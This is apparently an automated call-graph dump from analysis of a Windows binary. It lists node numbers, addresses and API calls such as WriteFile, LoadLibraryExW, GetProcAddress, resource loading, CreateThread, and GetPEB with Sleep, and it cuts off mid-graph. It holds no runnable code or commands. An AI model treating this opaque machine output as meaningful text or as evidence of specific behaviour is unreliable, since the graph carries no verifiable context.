e2d8f8 105109 e2d90b 105107->105109 105110 e2d91e 105107->105110 105129 e2d975 105109->105129 105196 e28b28 58 API calls __getptd_noexit 105110->105196 105111 e2d961 105201 e28db6 9 API calls __close 105111->105201 105115 e2d917 105198 e2d94d LeaveCriticalSection __unlock_fhandle 105115->105198 105116 e2d8ab __close 105116->105052 105117 e2d923 105197 e28af4 58 API calls __getptd_noexit 105117->105197 105121 e2d212 __close 105120->105121 105122 e2d261 EnterCriticalSection 105121->105122 105123 e29c0b __lock 58 API calls 105121->105123 105124 e2d287 __close 105122->105124 105125 e2d237 105123->105125 105124->105107 105126 e2d24f 105125->105126 105202 e29e2b InitializeCriticalSectionAndSpinCount 105125->105202 105203 e2d28b LeaveCriticalSection _doexit 105126->105203 105130 e2d982 __ftell_nolock 105129->105130 105131 e2d9e0 105130->105131 105132 e2d9c1 105130->105132 105162 e2d9b6 105130->105162 105136 e2da38 105131->105136 105137 e2da1c 105131->105137 105213 e28af4 58 API calls __getptd_noexit 105132->105213 105135 e2d9c6 105214 e28b28 58 API calls __getptd_noexit 105135->105214 105140 e2da51 105136->105140 105219 e318c1 60 API calls 3 library calls 105136->105219 105216 e28af4 58 API calls __getptd_noexit 105137->105216 105138 e2e1d6 105138->105115 105204 e35c6b 105140->105204 105142 e2d9cd 105215 e28db6 9 API calls __close 105142->105215 105145 e2da21 105217 e28b28 58 API calls __getptd_noexit 105145->105217 105147 e2da5f 105149 e2ddb8 105147->105149 105220 e299ac 58 API calls 2 library calls 105147->105220 105151 e2ddd6 105149->105151 105152 e2e14b WriteFile 105149->105152 105150 e2da28 105218 e28db6 9 API calls __close 105150->105218 105155 e2defa 105151->105155 105160 e2ddec 105151->105160 105156 e2ddab GetLastError 105152->105156 105164 e2dd78 105152->105164 105167 e2df05 105155->105167 105170 e2dfef 105155->105170 105156->105164 105157 e2da8b GetConsoleMode 105157->105149 105159 e2daca 105157->105159 105158 e2e184 105158->105162 105225 e28b28 58 API calls __getptd_noexit 105158->105225 105159->105149 105165 e2dada GetConsoleCP 105159->105165 105160->105158 105161 e2de5b WriteFile 105160->105161 105161->105156 105166 e2de98 105161->105166 105227 e2c5f6 105162->105227 105164->105158 105164->105162 105169 e2ded8 105164->105169 105165->105158 105189 e2db09 105165->105189 105166->105160 105172 e2debc 105166->105172 105167->105158 105173 e2df6a WriteFile 105167->105173 105168 e2e1b2 105226 e28af4 58 API calls __getptd_noexit 105168->105226 105175 e2dee3 105169->105175 105176 e2e17b 105169->105176 105170->105158 105171 e2e064 WideCharToMultiByte 105170->105171 105171->105156 105185 e2e0ab 105171->105185 105172->105164 105173->105156 105177 e2dfb9 105173->105177 105222 e28b28 58 API calls __getptd_noexit 105175->105222 105224 e28b07 58 API calls 2 library calls 105176->105224 105177->105164 105177->105167 105177->105172 105180 e2e0b3 WriteFile 105183 e2e106 GetLastError 105180->105183 105180->105185 105181 e2dee8 105223 e28af4 58 API calls __getptd_noexit 105181->105223 105183->105185 105185->105164 105185->105170 105185->105172 105185->105180 105186 e2dbf2 WideCharToMultiByte 105186->105164 105188 e2dc2d WriteFile 105186->105188 105187 e362ba 60 API calls __write_nolock 105187->105189 105188->105156 105191 e2dc5f 105188->105191 105189->105164 105189->105186 105189->105187 105189->105191 105221 e235f5 58 API calls __isleadbyte_l 105189->105221 105190 e37a5e WriteConsoleW CreateFileW __putwch_nolock 105190->105191 105191->105156 105191->105164 105191->105189 105191->105190 105192 e2dc87 WriteFile 105191->105192 105192->105156 105192->105191 105193->105098 105194->105116 105195->105106 105196->105117 105197->105115 105198->105116 105199->105106 105200->105111 105201->105116 105202->105126 105203->105122 105205 e35c83 105204->105205 105206 e35c76 105204->105206 105208 e35c8f 105205->105208 105209 e28b28 __close 58 API calls 105205->105209 105207 e28b28 __close 58 API calls 105206->105207 105210 e35c7b 105207->105210 105208->105147 105211 e35cb0 105209->105211 105210->105147 105212 e28db6 __close 9 API calls 105211->105212 105212->105210 105213->105135 105214->105142 105215->105162 105216->105145 105217->105150 105218->105162 105219->105140 105220->105157 105221->105189 105222->105181 105223->105162 105224->105162 105225->105168 105226->105162 105228 e2c600 IsProcessorFeaturePresent 105227->105228 105229 e2c5fe 105227->105229 105231 e3590a 105228->105231 105229->105138 105232 e358b9 ___raise_securityfailure 5 API calls 105231->105232 105233 e359ed 105232->105233 105233->105138 105234->105061 105235->105063 105259 e2d4c3 105236->105259 105238 e30aeb 105239 e30b41 105238->105239 105241 e30b1f 105238->105241 105244 e2d4c3 __lseeki64_nolock 58 API calls 105238->105244 105272 e2d43d 59 API calls __close 105239->105272 105241->105239 105242 e2d4c3 __lseeki64_nolock 58 API calls 105241->105242 105245 e30b2b CloseHandle 105242->105245 105243 e30b49 105246 e30b6b 105243->105246 105273 e28b07 58 API calls 2 library calls 105243->105273 105247 e30b16 105244->105247 105245->105239 105249 e30b37 GetLastError 105245->105249 105246->105088 105248 e2d4c3 __lseeki64_nolock 58 API calls 105247->105248 105248->105241 105249->105239 105251->105070 105252->105086 105253->105076 105254->105088 105255->105086 105256->105076 105257->105083 105258->105086 105260 e2d4e3 105259->105260 105261 e2d4ce 105259->105261 105265 e2d508 105260->105265 105276 e28af4 58 API calls __getptd_noexit 105260->105276 105274 e28af4 58 API calls __getptd_noexit 105261->105274 105264 e2d4d3 105275 e28b28 58 API calls __getptd_noexit 105264->105275 105265->105238 105266 e2d512 105277 e28b28 58 API calls __getptd_noexit 105266->105277 105269 e2d4db 105269->105238 105270 e2d51a 105278 e28db6 9 API calls __close 105270->105278 105272->105243 105273->105246 105274->105264 105275->105269 105276->105266 105277->105270 105278->105269 105305 e07a16 105279->105305 105281 e0646a 105312 e0750f 105281->105312 105283 e06484 Mailbox 105283->104878 105286 e06265 105286->105281 105287 e3dff6 105286->105287 105288 e07d8c 59 API calls 105286->105288 105289 e06799 _memmove 105286->105289 105290 e0750f 59 API calls 105286->105290 105297 e3df92 105286->105297 105301 e07e4f 59 API calls 105286->105301 105310 e05f6c 60 API calls 105286->105310 105311 e05d41 59 API calls Mailbox 105286->105311 105320 e05e72 60 API calls 105286->105320 105321 e07924 59 API calls 2 library calls 105286->105321 105325 e5f8aa 91 API calls 4 library calls 105287->105325 105288->105286 105326 e5f8aa 91 API calls 4 library calls 105289->105326 105290->105286 105294 e3e004 105295 e0750f 59 API calls 105294->105295 105296 e3e01a 105295->105296 105296->105283 105322 e08029 105297->105322 105299 e3df9d 105303 e20db6 Mailbox 59 API calls 105299->105303 105302 e0643b CharUpperBuffW 105301->105302 105302->105286 105303->105289 105304->104882 105306 e20db6 Mailbox 59 API calls 105305->105306 105307 e07a3b 105306->105307 105308 e08029 59 API calls 105307->105308 105309 e07a4a 105308->105309 105309->105286 105310->105286 105311->105286 105313 e075af 105312->105313 105316 e07522 _memmove 105312->105316 105315 e20db6 Mailbox 59 API calls 105313->105315 105314 e20db6 Mailbox 59 API calls 105317 e07529 105314->105317 105315->105316 105316->105314 105318 e20db6 Mailbox 59 API calls 105317->105318 105319 e07552 105317->105319 105318->105319 105319->105283 105320->105286 105321->105286 105323 e20db6 Mailbox 59 API calls 105322->105323 105324 e08033 105323->105324 105324->105299 105325->105294 105326->105283 105542 e04bb5 105327->105542 105332 e3d8e6 105335 e04e4a 84 API calls 105332->105335 105333 e04e08 LoadLibraryExW 105552 e04b6a 105333->105552 105337 e3d8ed 105335->105337 105339 e04b6a 3 API calls 105337->105339 105341 e3d8f5 105339->105341 105340 e04e2f 105340->105341 105342 e04e3b 105340->105342 105578 e04f0b 105341->105578 105343 e04e4a 84 API calls 105342->105343 105345 e04e40 105343->105345 105345->104899 105345->104902 105348 e3d91c 105586 e04ec7 105348->105586 105352 e07667 59 API calls 105351->105352 105353 e045b1 105352->105353 105354 e07667 59 API calls 105353->105354 105355 e045b9 105354->105355 105356 e07667 59 API calls 105355->105356 105357 e045c1 105356->105357 105358 e07667 59 API calls 105357->105358 105359 e045c9 105358->105359 105360 e3d4d2 105359->105360 105361 e045fd 105359->105361 105362 e08047 59 API calls 105360->105362 105363 e0784b 59 API calls 105361->105363 105364 e3d4db 105362->105364 105365 e0460b 105363->105365 105772 e07d8c 105364->105772 105768 e07d2c 105365->105768 105368 e04615 105369 e04640 105368->105369 105370 e0784b 59 API calls 105368->105370 105371 e04680 105369->105371 105373 e0465f 105369->105373 105384 e3d4fb 105369->105384 105374 e04636 105370->105374 105755 e0784b 105371->105755 105375 e079f2 59 API calls 105373->105375 105378 e07d2c 59 API calls 105374->105378 105379 e04669 105375->105379 105376 e04691 105380 e046a3 105376->105380 105382 e08047 59 API calls 105376->105382 105377 e3d5cb 105381 e07bcc 59 API calls 105377->105381 105378->105369 105379->105371 105386 e0784b 59 API calls 105379->105386 105383 e046b3 105380->105383 105387 e08047 59 API calls 105380->105387 105401 e3d588 105381->105401 105382->105380 105385 e046ba 105383->105385 105388 e08047 59 API calls 105383->105388 105384->105377 105390 e3d5b4 105384->105390 105398 e3d532 105384->105398 105389 e08047 59 API calls 105385->105389 105397 e046c1 Mailbox 105385->105397 105386->105371 105387->105383 105388->105385 105389->105397 105390->105377 105392 e3d59f 105390->105392 105391 e3d590 105393 e07bcc 59 API calls 105391->105393 105394 e07bcc 59 API calls 105392->105394 105393->105401 105394->105401 105395 e079f2 59 API calls 105395->105401 105397->104932 105398->105391 105399 e3d57b 105398->105399 105400 e07bcc 59 API calls 105399->105400 105400->105401 105401->105371 105401->105395 105776 e07924 59 API calls 2 library calls 105401->105776 105403 e07e4f 59 API calls 105402->105403 105404 e079fd 105403->105404 105404->104937 105404->104939 105406 e07b40 105405->105406 105407 e3ec6b 105405->105407 105778 e07a51 105406->105778 105784 e57bdb 59 API calls _memmove 105407->105784 105410 e3ec75 105412 e08047 59 API calls 105410->105412 105411 e07b4c 105411->104947 105413 e3ec7d Mailbox 105412->105413 105415 e6408d 105414->105415 105416 e64092 105415->105416 105417 e640a0 105415->105417 105419 e08047 59 API calls 105416->105419 105418 e07667 59 API calls 105417->105418 105420 e640a8 105418->105420 105421 e6409b Mailbox 105419->105421 105422 e07667 59 API calls 105420->105422 105421->104955 105423 e640b0 105422->105423 105424 e07667 59 API calls 105423->105424 105425 e640bb 105424->105425 105426 e07667 59 API calls 105425->105426 105427 e640c3 105426->105427 105428 e07667 59 API calls 105427->105428 105429 e640cb 105428->105429 105430 e07667 59 API calls 105429->105430 105431 e640d3 105430->105431 105432 e07667 59 API calls 105431->105432 105433 e640db 105432->105433 105434 e07667 59 API calls 105433->105434 105435 e640e3 105434->105435 105436 e0459b 59 API calls 105435->105436 105437 e640fa 105436->105437 105438 e0459b 59 API calls 105437->105438 105439 e64113 105438->105439 105440 e079f2 59 API calls 105439->105440 105441 e6411f 105440->105441 105442 e64132 105441->105442 105443 e07d2c 59 API calls 105441->105443 105444 e079f2 59 API calls 105442->105444 105443->105442 105445 e6413b 105444->105445 105446 e6414b 105445->105446 105447 e07d2c 59 API calls 105445->105447 105448 e08047 59 API calls 105446->105448 105447->105446 105449 e64157 105448->105449 105450 e07b2e 59 API calls 105449->105450 105451 e64163 105450->105451 105785 e64223 59 API calls 105451->105785 105453 e64172 105786 e64223 59 API calls 105453->105786 105455 e64185 105456 e079f2 59 API calls 105455->105456 105457 e6418f 105456->105457 105458 e641a6 105457->105458 105459 e64194 105457->105459 105461 e079f2 59 API calls 105458->105461 105460 e07cab 59 API calls 105459->105460 105463 e641af 105461->105463 105469 e69162 __ftell_nolock 105468->105469 105470 e20db6 Mailbox 59 API calls 105469->105470 105471 e691bf 105470->105471 105472 e0522e 59 API calls 105471->105472 105473 e691c9 105472->105473 105474 e68f5f GetSystemTimeAsFileTime 105473->105474 105475 e691d4 105474->105475 105476 e04ee5 85 API calls 105475->105476 105477 e691e7 _wcscmp 105476->105477 105478 e6920b 105477->105478 105479 e692b8 105477->105479 105804 e69734 105478->105804 105481 e69734 96 API calls 105479->105481 105496 e69284 _wcscat 105481->105496 105484 e04f0b 74 API calls 105486 e692dd 105484->105486 105485 e692c1 105485->104962 105487 e04f0b 74 API calls 105486->105487 105489 e692ed 105487->105489 105488 e69239 _wcscat _wcscpy 105811 e240fb 58 API calls __wsplitpath_helper 105488->105811 105490 e04f0b 74 API calls 105489->105490 105492 e69308 105490->105492 105493 e04f0b 74 API calls 105492->105493 105494 e69318 105493->105494 105495 e04f0b 74 API calls 105494->105495 105497 e69333 105495->105497 105496->105484 105496->105485 105498 e04f0b 74 API calls 105497->105498 105499 e69343 105498->105499 105500 e04f0b 74 API calls 105499->105500 105501 e69353 105500->105501 105502 e04f0b 74 API calls 105501->105502 105503 e69363 105502->105503 105787 e698e3 GetTempPathW GetTempFileNameW 105503->105787 105505 e6936f 105506 e2525b 115 API calls 105505->105506 105523->104888 105525 e3ed4a 105524->105525 105526 e07cbf 105524->105526 105528 e08029 59 API calls 105525->105528 105831 e07c50 105526->105831 105530 e3ed55 __NMSG_WRITE _memmove 105528->105530 105529 e07cca 105529->104921 105531->104925 105532->104938 105534 e07c45 105533->105534 105535 e07bd8 __NMSG_WRITE 105533->105535 105536 e07d2c 59 API calls 105534->105536 105537 e07c13 105535->105537 105538 e07bee 105535->105538 105541 e07bf6 _memmove 105536->105541 105540 e08029 59 API calls 105537->105540 105836 e07f27 59 API calls Mailbox 105538->105836 105540->105541 105541->104946 105591 e04c03 105542->105591 105545 e04c03 2 API calls 105548 e04bdc 105545->105548 105546 e04bf5 105549 e2525b 105546->105549 105547 e04bec FreeLibrary 105547->105546 105548->105546 105548->105547 105595 e25270 105549->105595 105551 e04dfc 105551->105332 105551->105333 105676 e04c36 105552->105676 105555 e04ba1 FreeLibrary 105556 e04baa 105555->105556 105559 e04c70 105556->105559 105557 e04c36 2 API calls 105558 e04b8f 105557->105558 105558->105555 105558->105556 105560 e20db6 Mailbox 59 API calls 105559->105560 105561 e04c85 105560->105561 105680 e0522e 105561->105680 105563 e04c91 _memmove 105564 e04ccc 105563->105564 105566 e04dc1 105563->105566 105567 e04d89 105563->105567 105565 e04ec7 69 API calls 105564->105565 105570 e04cd5 105565->105570 105694 e6991b 95 API calls 105566->105694 105683 e04e89 CreateStreamOnHGlobal 105567->105683 105571 e04f0b 74 API calls 105570->105571 105573 e3d8a7 105570->105573 105577 e04d69 105570->105577 105689 e04ee5 105570->105689 105571->105570 105574 e04ee5 85 API calls 105573->105574 105575 e3d8bb 105574->105575 105576 e04f0b 74 API calls 105575->105576 105576->105577 105577->105340 105579 e04f1d 105578->105579 105580 e3d9cd 105578->105580 105712 e255e2 105579->105712 105583 e69109 105732 e68f5f 105583->105732 105585 e6911f 105585->105348 105587 e04ed6 105586->105587 105590 e3d990 105586->105590 105737 e25c60 105587->105737 105589 e04ede 105592 e04bd0 105591->105592 105593 e04c0c LoadLibraryA 105591->105593 105592->105545 105592->105548 105593->105592 105594 e04c1d GetProcAddress 105593->105594 105594->105592 105598 e2527c __close 105595->105598 105596 e2528f 105644 e28b28 58 API calls __getptd_noexit 105596->105644 105598->105596 105600 e252c0 105598->105600 105599 e25294 105645 e28db6 9 API calls __close 105599->105645 105614 e304e8 105600->105614 105603 e252c5 105604 e252db 105603->105604 105605 e252ce 105603->105605 105606 e25305 105604->105606 105607 e252e5 105604->105607 105646 e28b28 58 API calls __getptd_noexit 105605->105646 105629 e30607 105606->105629 105647 e28b28 58 API calls __getptd_noexit 105607->105647 105611 e2529f __close @_EH4_CallFilterFunc@8 105611->105551 105615 e304f4 __close 105614->105615 105616 e29c0b __lock 58 API calls 105615->105616 105627 e30502 105616->105627 105617 e30576 105649 e305fe 105617->105649 105618 e3057d 105654 e2881d 58 API calls __malloc_crt 105618->105654 105621 e30584 105621->105617 105655 e29e2b InitializeCriticalSectionAndSpinCount 105621->105655 105622 e305f3 __close 105622->105603 105624 e29c93 __mtinitlocknum 58 API calls 105624->105627 105626 e305aa EnterCriticalSection 105626->105617 105627->105617 105627->105618 105627->105624 105652 e26c50 59 API calls __lock 105627->105652 105653 e26cba LeaveCriticalSection LeaveCriticalSection _doexit 105627->105653 105630 e30627 __wopenfile 105629->105630 105631 e30641 105630->105631 105643 e307fc 105630->105643 105662 e237cb 60 API calls 2 library calls 105630->105662 105660 e28b28 58 API calls __getptd_noexit 105631->105660 105633 e30646 105661 e28db6 9 API calls __close 105633->105661 105635 e25310 105648 e25332 LeaveCriticalSection LeaveCriticalSection __wfsopen 105635->105648 105636 e3085f 105657 e385a1 105636->105657 105639 e307f5 105639->105643 105663 e237cb 60 API calls 2 library calls 105639->105663 105641 e30814 105641->105643 105664 e237cb 60 API calls 2 library calls 105641->105664 105643->105631 105643->105636 105644->105599 105645->105611 105646->105611 105647->105611 105648->105611 105656 e29d75 LeaveCriticalSection 105649->105656 105651 e30605 105651->105622 105652->105627 105653->105627 105654->105621 105655->105626 105656->105651 105665 e37d85 105657->105665 105659 e385ba 105659->105635 105660->105633 105661->105635 105662->105639 105663->105641 105664->105643 105666 e37d91 __close 105665->105666 105667 e37da7 105666->105667 105670 e37ddd 105666->105670 105668 e28b28 __close 58 API calls 105667->105668 105669 e37dac 105668->105669 105671 e28db6 __close 9 API calls 105669->105671 105672 e37e4e __wsopen_nolock 109 API calls 105670->105672 105675 e37db6 __close 105671->105675 105673 e37df9 105672->105673 105674 e37e22 __wsopen_helper LeaveCriticalSection 105673->105674 105674->105675 105675->105659 105677 e04b83 105676->105677 105678 e04c3f LoadLibraryA 105676->105678 105677->105557 105677->105558 105678->105677 105679 e04c50 GetProcAddress 105678->105679 105679->105677 105681 e20db6 Mailbox 59 API calls 105680->105681 105682 e05240 105681->105682 105682->105563 105684 e04ea3 FindResourceExW 105683->105684 105686 e04ec0 105683->105686 105685 e3d933 LoadResource 105684->105685 105684->105686 105685->105686 105687 e3d948 SizeofResource 105685->105687 105686->105564 105687->105686 105688 e3d95c LockResource 105687->105688 105688->105686 105690 e04ef4 105689->105690 105691 e3d9ab 105689->105691 105695 e2584d 105690->105695 105693 e04f02 105693->105570 105694->105564 105696 e25859 __close 105695->105696 105697 e2586b 105696->105697 105699 e25891 105696->105699 105708 e28b28 58 API calls __getptd_noexit 105697->105708 105701 e26c11 __lock_file 59 API calls 105699->105701 105700 e25870 105709 e28db6 9 API calls __close 105700->105709 105702 e25897 105701->105702 105710 e257be 83 API calls 5 library calls 105702->105710 105705 e258a6 105711 e258c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 105705->105711 105706 e2587b __close 105706->105693 105708->105700 105709->105706 105710->105705 105711->105706 105715 e255fd 105712->105715 105714 e04f2e 105714->105583 105716 e25609 __close 105715->105716 105717 e2564c 105716->105717 105718 e25644 __close 105716->105718 105720 e2561f _memset 105716->105720 105719 e26c11 __lock_file 59 API calls 105717->105719 105718->105714 105721 e25652 105719->105721 105728 e28b28 58 API calls __getptd_noexit 105720->105728 105730 e2541d 72 API calls 6 library calls 105721->105730 105724 e25639 105729 e28db6 9 API calls __close 105724->105729 105725 e25668 105731 e25686 LeaveCriticalSection LeaveCriticalSection __wfsopen 105725->105731 105728->105724 105729->105718 105730->105725 105731->105718 105735 e2520a GetSystemTimeAsFileTime 105732->105735 105734 e68f6e 105734->105585 105736 e25238 __aulldiv 105735->105736 105736->105734 105738 e25c6c __close 105737->105738 105739 e25c93 105738->105739 105740 e25c7e 105738->105740 105742 e26c11 __lock_file 59 API calls 105739->105742 105751 e28b28 58 API calls __getptd_noexit 105740->105751 105744 e25c99 105742->105744 105743 e25c83 105752 e28db6 9 API calls __close 105743->105752 105753 e258d0 67 API calls 6 library calls 105744->105753 105747 e25ca4 105754 e25cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 105747->105754 105749 e25cb6 105750 e25c8e __close 105749->105750 105750->105589 105751->105743 105752->105750 105753->105747 105754->105749 105756 e078b7 105755->105756 105757 e0785a 105755->105757 105758 e07d2c 59 API calls 105756->105758 105757->105756 105759 e07865 105757->105759 105765 e07888 _memmove 105758->105765 105760 e07880 105759->105760 105761 e3eb09 105759->105761 105777 e07f27 59 API calls Mailbox 105760->105777 105762 e08029 59 API calls 105761->105762 105764 e3eb13 105762->105764 105766 e20db6 Mailbox 59 API calls 105764->105766 105765->105376 105767 e3eb33 105766->105767 105769 e07d3a 105768->105769 105771 e07d43 _memmove 105768->105771 105770 e07e4f 59 API calls 105769->105770 105769->105771 105770->105771 105771->105368 105773 e07da6 105772->105773 105774 e07d99 105772->105774 105775 e20db6 Mailbox 59 API calls 105773->105775 105774->105369 105775->105774 105776->105401 105777->105765 105779 e07a5f 105778->105779 105780 e07a85 _memmove 105778->105780 105779->105780 105781 e20db6 Mailbox 59 API calls 105779->105781 105780->105411 105780->105780 105782 e07ad4 105781->105782 105783 e20db6 Mailbox 59 API calls 105782->105783 105783->105780 105784->105410 105785->105453 105786->105455 105787->105505 105805 e69748 __tzset_nolock _wcscmp 105804->105805 105806 e04f0b 74 API calls 105805->105806 105807 e69109 GetSystemTimeAsFileTime 105805->105807 105808 e69210 105805->105808 105809 e04ee5 85 API calls 105805->105809 105806->105805 105807->105805 105808->105485 105810 e240fb 58 API calls __wsplitpath_helper 105808->105810 105809->105805 105810->105488 105811->105496 105832 e07c5f __NMSG_WRITE 105831->105832 105833 e08029 59 API calls 105832->105833 105834 e07c70 _memmove 105832->105834 105835 e3ed07 _memmove 105833->105835 105834->105529 105836->105541 105838 e63c3e 105837->105838 105839 e64475 FindFirstFileW 105837->105839 105838->104721 105839->105838 105840 e6448a FindClose 105839->105840 105840->105838 105841->104976 105842->104973 105843->104989 105844->104984 105845->104990 105846->105000 105847->105002 105848->105006 105849->104743 105850->104746 105852 e0b91a 105851->105852 105853 e0bac7 105851->105853 105852->105853 105854 e0bf81 105852->105854 105856 e0b9fc 105852->105856 105862 e0baab 105852->105862 105853->105854 105857 e0bb46 105853->105857 105853->105862 105864 e0ba8b Mailbox 105853->105864 105854->105862 105876 e094dc 59 API calls __gmtime64_s 105854->105876 105856->105857 105861 e0ba38 105856->105861 105856->105862 105859 e41361 105857->105859 105857->105862 105857->105864 105873 e56e8f 59 API calls 105857->105873 105859->105862 105874 e23d46 59 API calls __wtof_l 105859->105874 105861->105862 105861->105864 105866 e411b4 105861->105866 105862->104637 105864->104637 105864->105859 105864->105862 105875 e08cd4 59 API calls Mailbox 105864->105875 105866->105862 105872 e23d46 59 API calls __wtof_l 105866->105872 105867->104637 105868->104632 105869->104631 105870->104626 105871->104631 105872->105866 105873->105864 105874->105862 105875->105864 105876->105862 105877->104661 105878->104666 105879 e01066 105884 e0f76f 105879->105884 105881 e0106c 105882 e22d40 __cinit 67 API calls 105881->105882 105883 e01076 105882->105883 105885 e0f790 105884->105885 105917 e1ff03 105885->105917 105889 e0f7d7 105890 e07667 59 API calls 105889->105890 105891 e0f7e1 105890->105891 105892 e07667 59 API calls 105891->105892 105893 e0f7eb 105892->105893 105894 e07667 59 API calls 105893->105894 105895 e0f7f5 105894->105895 105896 e07667 59 API calls 105895->105896 105897 e0f833 105896->105897 105898 e07667 59 API calls 105897->105898 105899 e0f8fe 105898->105899 105927 e15f87 105899->105927 105903 e0f930 105904 e07667 59 API calls 105903->105904 105905 e0f93a 105904->105905 105955 e1fd9e 105905->105955 105907 e0f981 105908 e0f991 GetStdHandle 105907->105908 105909 e0f9dd 105908->105909 105910 e445ab 105908->105910 105911 e0f9e5 OleInitialize 105909->105911 105910->105909 105912 e445b4 105910->105912 105911->105881 105962 e66b38 64 API calls Mailbox 105912->105962 105914 e445bb 105963 e67207 CreateThread 105914->105963 105916 e445c7 CloseHandle 105916->105911 105964 e1ffdc 105917->105964 105920 e1ffdc 59 API calls 105921 e1ff45 105920->105921 105922 e07667 59 API calls 105921->105922 105923 e1ff51 105922->105923 105924 e07bcc 59 API calls 105923->105924 105925 e0f796 105924->105925 105926 e20162 6 API calls 105925->105926 105926->105889 105928 e07667 59 API calls 105927->105928 105929 e15f97 105928->105929 105930 e07667 59 API calls 105929->105930 105931 e15f9f 105930->105931 105971 e15a9d 105931->105971 105934 e15a9d 59 API calls 105935 e15faf 105934->105935 105936 e07667 59 API calls 105935->105936 105937 e15fba 105936->105937 105938 e20db6 Mailbox 59 API calls 105937->105938 105939 e0f908 105938->105939 105940 e160f9 105939->105940 105941 e16107 105940->105941 105942 e07667 59 API calls 105941->105942 105943 e16112 105942->105943 105944 e07667 59 API calls 105943->105944 105945 e1611d 105944->105945 105946 e07667 59 API calls 105945->105946 105947 e16128 105946->105947 105948 e07667 59 API calls 105947->105948 105949 e16133 105948->105949 105950 e15a9d 59 API calls 105949->105950 105951 e1613e 105950->105951 105952 e20db6 Mailbox 59 API calls 105951->105952 105953 e16145 RegisterWindowMessageW 105952->105953 105953->105903 105956 e5576f 105955->105956 105957 e1fdae 105955->105957 105974 e69ae7 60 API calls 105956->105974 105959 e20db6 Mailbox 59 API calls 105957->105959 105961 e1fdb6 105959->105961 105960 e5577a 105961->105907 105962->105914 105963->105916 105975 e671ed 65 API calls 105963->105975 105965 e07667 59 API calls 105964->105965 105966 e1ffe7 105965->105966 105967 e07667 59 API calls 105966->105967 105968 e1ffef 105967->105968 105969 e07667 59 API calls 105968->105969 105970 e1ff3b 105969->105970 105970->105920 105972 e07667 59 API calls 105971->105972 105973 e15aa5 105972->105973 105973->105934 105974->105960 105976 e4416f 105980 e55fe6 105976->105980 105978 e4417a 105979 e55fe6 85 API calls 105978->105979 105979->105978 105981 e56020 105980->105981 105985 e55ff3 105980->105985 105981->105978 105982 e56022 105992 e09328 84 API calls Mailbox 105982->105992 105983 e56027 105986 e09837 84 API calls 105983->105986 105985->105981 105985->105982 105985->105983 105989 e5601a 105985->105989 105987 e5602e 105986->105987 105988 e07b2e 59 API calls 105987->105988 105988->105981 105991 e095a0 59 API calls _wcsstr 105989->105991 105991->105981 105992->105983 105993 e68d0d 105994 e68d20 105993->105994 105995 e68d1a 105993->105995 105997 e68d31 105994->105997 105998 e22d55 _free 58 API calls 105994->105998 105996 e22d55 _free 58 API calls 105995->105996 105996->105994 105999 e22d55 _free 58 API calls 105997->105999 106000 e68d43 105997->106000 105998->105997 105999->106000 106001 104fc48 106015 104d898 106001->106015 106003 104fce8 106018 104fb38 106003->106018 106021 1050d18 GetPEB 106015->106021 106017 104df23 106017->106003 106019 104fb41 Sleep 106018->106019 106020 104fb4f 106019->106020 106022 1050d42 106021->106022 106022->106017 106023 e03633 106024 e0366a 106023->106024 106025 e036e7 106024->106025 106026 e03688 106024->106026 106063 e036e5 106024->106063 106028 e036ed 106025->106028 106029 e3d0cc 106025->106029 106030 e03695 106026->106030 106031 e0374b PostQuitMessage 106026->106031 106027 e036ca DefWindowProcW 106065 e036d8 106027->106065 106032 e036f2 106028->106032 106033 e03715 SetTimer RegisterWindowMessageW 106028->106033 106078 e11070 10 API calls Mailbox 106029->106078 106035 e036a0 106030->106035 106036 e3d154 106030->106036 106031->106065 106041 e036f9 KillTimer 106032->106041 106042 e3d06f 106032->106042 106037 e0373e CreatePopupMenu 106033->106037 106033->106065 106038 e03755 106035->106038 106039 e036a8 106035->106039 106094 e62527 71 API calls _memset 106036->106094 106037->106065 106068 e044a0 106038->106068 106045 e036b3 106039->106045 106046 e3d139 106039->106046 106075 e0443a Shell_NotifyIconW _memset 106041->106075 106049 e3d074 106042->106049 106050 e3d0a8 MoveWindow 106042->106050 106043 e3d0f3 106079 e11093 331 API calls Mailbox 106043->106079 106052 e3d124 106045->106052 106056 e036be 106045->106056 106046->106027 106093 e57c36 59 API calls Mailbox 106046->106093 106047 e3d166 106047->106027 106047->106065 106053 e3d097 SetFocus 106049->106053 106054 e3d078 106049->106054 106050->106065 106092 e62d36 81 API calls _memset 106052->106092 106053->106065 106054->106056 106057 e3d081 106054->106057 106055 e0370c 106076 e03114 DeleteObject DestroyWindow Mailbox 106055->106076 106056->106027 106080 e0443a Shell_NotifyIconW _memset 106056->106080 106077 e11070 10 API calls Mailbox 106057->106077 106062 e3d134 106062->106065 106063->106027 106066 e3d118 106081 e0434a 106066->106081 106069 e044b7 _memset 106068->106069 106070 e04539 106068->106070 106095 e0407c 106069->106095 106070->106065 106072 e044de 106073 e04522 KillTimer SetTimer 106072->106073 106074 e3d4ab Shell_NotifyIconW 106072->106074 106073->106070 106074->106073 106075->106055 106076->106065 106077->106065 106078->106043 106079->106056 106080->106066 106082 e04375 _memset 106081->106082 106117 e04182 106082->106117 106086 e04430 Shell_NotifyIconW 106088 e04422 106086->106088 106087 e04414 Shell_NotifyIconW 106087->106088 106090 e0407c 61 API calls 106088->106090 106089 e043fa 106089->106086 106089->106087 106091 e04429 106090->106091 106091->106063 106092->106062 106093->106063 106094->106047 106096 e04098 106095->106096 106116 e0416f Mailbox 106095->106116 106097 e07a16 59 API calls 106096->106097 106098 e040a6 106097->106098 106099 e040b3 106098->106099 106100 e3d3c8 LoadStringW 106098->106100 106101 e07bcc 59 API calls 106099->106101 106103 e3d3e2 106100->106103 106102 e040c8 106101->106102 106102->106103 106104 e040d9 106102->106104 106105 e07b2e 59 API calls 106103->106105 106106 e040e3 106104->106106 106107 e04174 106104->106107 106108 e3d3ec 106105->106108 106110 e07b2e 59 API calls 106106->106110 106109 e08047 59 API calls 106107->106109 106111 e07cab 59 API calls 106108->106111 106112 e040ed _memset _wcscpy 106108->106112 106109->106112 106110->106112 106113 e3d40e 106111->106113 106114 e04155 Shell_NotifyIconW 106112->106114 106115 e07cab 59 API calls 106113->106115 106114->106116 106115->106112 106116->106072 106118 e3d423 106117->106118 106119 e04196 106117->106119 106118->106119 106120 e3d42c DestroyIcon 106118->106120 106119->106089 106121 e62f94 62 API calls _W_store_winword 106119->106121 106120->106119 106121->106089 106122 e27c56 106123 e27c62 __close 106122->106123 106159 e29e08 GetStartupInfoW 106123->106159 106125 e27c67 106161 e28b7c GetProcessHeap 106125->106161 